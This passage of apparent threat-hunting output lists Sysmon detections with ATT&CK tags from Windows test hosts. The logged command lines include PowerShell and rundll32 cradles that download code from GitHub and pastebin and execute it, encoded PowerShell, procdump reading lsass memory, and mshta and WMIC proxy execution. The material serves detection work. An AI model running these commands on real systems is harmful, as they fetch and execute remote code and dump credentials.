SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 
1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16498 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.852 + 365ABB72-517E-5CD8-0000-00105FE01700 + 2920 + C:\Windows\System32\calc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\calc.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line 
("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + 
IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User 
(IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 374 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-001071AD3E00 + 3944 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c test.bat + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966252 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.226 + 365ABB72-52B4-5C91-0000-0010D55B0100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential 
Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4434 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:09:41.328 + 365ABB72-9B75-5C8E-0000-0010013F1200 + 1856 + 980 + C:\Users\IEUser\Desktop\procdump.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.661 + 
747F3D96-FBCA-5D53-0000-001036784100 + 2876 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5901 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.771 + 365ABB72-3D6D-5CEB-0000-00100478FF00 + 3444 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6190 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.515 + 365ABB72-FE76-5CEB-0000-001077710C00 + 2840 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious 
Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c 
powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16497 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.781 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication 
";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4353 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.853 + 747F3D96-AE22-5D3A-0000-001004D84E00 + 5548 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 0xf99eb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + 
IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + 